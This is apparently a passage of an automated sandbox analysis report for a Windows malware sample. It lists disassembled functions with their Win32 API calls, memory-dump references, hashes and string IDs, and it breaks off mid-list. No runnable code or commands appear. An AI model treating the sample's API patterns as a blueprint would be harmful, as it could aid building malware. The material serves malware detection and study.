                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen
                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 39653677-4138519520
                                  • Opcode ID: 44228a9aabf3316c26f0685182be648e85af48144ede836de69516fa08834428
                                  • Instruction ID: f05733f76d369329389d8b370754a56879602374db4b05d018e58590b193e3e8
                                  • Opcode Fuzzy Hash: 44228a9aabf3316c26f0685182be648e85af48144ede836de69516fa08834428
                                  • Instruction Fuzzy Hash: 21217C395106898FCB22EB35C4447DEF76BDF80361F87C056C8180B24AE376190AD796
                                  Function 0035EB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0035EBB4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035EBE3
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035EBF1
                                  • lstrcat.KERNEL32(?,00FADD18), ref: 0035EC0C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: d5e4244878fcfebcf55f6ba055faaa072b6dff3ded8ab928c622839778790ce4
                                  • Instruction ID: 049269a07b3aefbb4103804c147da8961898c9ff2fa5c66a514c81e9c146e62f
                                  • Opcode Fuzzy Hash: d5e4244878fcfebcf55f6ba055faaa072b6dff3ded8ab928c622839778790ce4
                                  • Instruction Fuzzy Hash: D23188719101199BCB16EF64EC45FEE77F4AF58301F5044A4BA0AAF350DE30AF949BA0
                                  Function 00362B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0036A3D0,000000FF), ref: 00362B8F
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00362B96
                                  • GetLocalTime.KERNEL32(?,?,00000000,0036A3D0,000000FF), ref: 00362BA2
                                  • wsprintfA.USER32 ref: 00362BCE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 2cf2b747aac300d4a01b8a5b6741c58aafb5e2b4af82213e53d0f2b8b0e606ba
                                  • Instruction ID: f168cd330fd237377081b4d8adc8750ccee6b9dca83c56792ff3de8368a43d69
                                  • Opcode Fuzzy Hash: 2cf2b747aac300d4a01b8a5b6741c58aafb5e2b4af82213e53d0f2b8b0e606ba
                                  • Instruction Fuzzy Hash: 450152B2954528ABCB149BC9ED49FBFB7BCFB4CB11F00011AFA05A2280E7785544E7B1
                                  Function 00364480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000), ref: 00364492
                                  • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 003644AD
                                  • CloseHandle.KERNEL32(00000000), ref: 003644B4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003644E7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                  • String ID:
                                  • API String ID: 4028989146-0
                                  • Opcode ID: 27b53dfd89c520ab3b39ecc330e818da854d59db8cc3d6bf5c69b002bd03873b
                                  • Instruction ID: 6cdf47ddede3b142a618b47006911d5eb94e26fc0ec3d9586ccc47a54e45f7c7
                                  • Opcode Fuzzy Hash: 27b53dfd89c520ab3b39ecc330e818da854d59db8cc3d6bf5c69b002bd03873b
                                  • Instruction Fuzzy Hash: 5CF0FCB0D016152BE7229B75AC4DBE676A8AF15304F0145A0FA49D7180DFB09CC4C790
                                  Function 00368FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 00368FDD
                                    • Part of subcall function 003687FF: __amsg_exit.LIBCMT ref: 0036880F
                                  • __getptd.LIBCMT ref: 00368FF4
                                  • __amsg_exit.LIBCMT ref: 00369002
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00369026
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 0cda065f8dbfc180fa99d3a0ba75d5c7c589d98529b80e0f997f0b1a445e7cda
                                  • Instruction ID: 2d07a9c2c56372a6484bb7d810b670d064db517f9c4155bb86275376ed5483b1
                                  • Opcode Fuzzy Hash: 0cda065f8dbfc180fa99d3a0ba75d5c7c589d98529b80e0f997f0b1a445e7cda
                                  • Instruction Fuzzy Hash: B7F0F0329087108BDB63BB78980775D37A46F04724F25C20AF004AF2DADF741840DA55
                                  Function 00367363 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(------,00345BEB), ref: 0036731B
                                  • lstrcpy.KERNEL32(00000000), ref: 0036733F
                                  • lstrcat.KERNEL32(?,------), ref: 00367349
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrcpylstrlen
                                  • String ID: ------
                                  • API String ID: 3050337572-882505780
                                  • Opcode ID: e6b0fd0831c926114ca9bf35cc31ba57665766272af6a7a9fbb1c9f2cc36a10e
                                  • Instruction ID: 59234ad7fd3f9deb1abdcea9142ad0e5669bcee1849570337e6280a304cf8416
                                  • Opcode Fuzzy Hash: e6b0fd0831c926114ca9bf35cc31ba57665766272af6a7a9fbb1c9f2cc36a10e
                                  • Instruction Fuzzy Hash: 7DF05E785143029FCB259F25E84892BBAF4AF44704769882DE8DAC7318E730D880EFB1
                                  Function 00367310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(------,00345BEB), ref: 0036731B
                                  • lstrcpy.KERNEL32(00000000), ref: 0036733F
                                  • lstrcat.KERNEL32(?,------), ref: 00367349
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrcpylstrlen
                                  • String ID: ------
                                  • API String ID: 3050337572-882505780
                                  • Opcode ID: 8c2b8efc148cfcd87e9f1c63701763aa1153329ad92ea0f47a5ee0d7bc09ca02
                                  • Instruction ID: 92fe88f8a6d31d21e123d3c77669c449ca600ca5a8891b06cdceb35775ef21f1
                                  • Opcode Fuzzy Hash: 8c2b8efc148cfcd87e9f1c63701763aa1153329ad92ea0f47a5ee0d7bc09ca02
                                  • Instruction Fuzzy Hash: 96F0C0785117029FDB259F35E84C927B6F9EF55705369882DA89AC7318E730D880EF60
                                  Function 003533D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341557
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341579
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 0034159B
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 003415FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00353422
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035344B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00353471
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00353497
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 0ac9ac11ad34081170e7b69893edbe0c2e7de392f076328d513b1969928365a7
                                  • Instruction ID: 71244d1a5dd2fc14a94416f114b4215695877be4970f6cff81f73fabce6f9096
                                  • Opcode Fuzzy Hash: 0ac9ac11ad34081170e7b69893edbe0c2e7de392f076328d513b1969928365a7
                                  • Instruction Fuzzy Hash: 8F121D70A012018FDB1ACF19D554F25B7E1AF4535AB1AC0ADE809DB3B1D772DD4ADB80
                                  Function 00357C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00357C94
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00357CAF
                                    • Part of subcall function 00357D40: std::_Xinvalid_argument.LIBCPMT ref: 00357D58
                                    • Part of subcall function 00357D40: std::_Xinvalid_argument.LIBCPMT ref: 00357D76
                                    • Part of subcall function 00357D40: std::_Xinvalid_argument.LIBCPMT ref: 00357D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: string too long
                                  • API String ID: 909987262-2556327735
                                  • Opcode ID: 2a7052a0c919f30f38361ed2d35869b4fa898b38e6bf3d4b8959c45945324523
                                  • Instruction ID: 14e07a1d145335e70627bf616d0ffe0d9a887244cd5aeea7eba2198db367afc0
                                  • Opcode Fuzzy Hash: 2a7052a0c919f30f38361ed2d35869b4fa898b38e6bf3d4b8959c45945324523
                                  • Instruction Fuzzy Hash: 983107723086148BD736DE6CF8C0D6AF3F9EF91762B21462AF8468B661C7719C4583A4
                                  Function 00346EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00346F74
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00346F7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID: @
                                  • API String ID: 1357844191-2766056989
                                  • Opcode ID: 781b66c4cf47b73e95adcdfd6bf3e835472f620f825c10252323edd3f674a142
                                  • Instruction ID: 94a91048f5ffd0187862ea4576de2fa79db86b31a054d9b9d062bdbf7b6446b5
                                  • Opcode Fuzzy Hash: 781b66c4cf47b73e95adcdfd6bf3e835472f620f825c10252323edd3f674a142
                                  • Instruction Fuzzy Hash: E0216DB06007019BEB218F20DC85BB673E8EB52704F454868E98ACF684E775F989CB61
                                  Function 00362400 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0036244C
                                  • lstrlen.KERNEL32(00000000), ref: 003624E9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00362570
                                  • lstrlen.KERNEL32(00000000), ref: 00362577
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
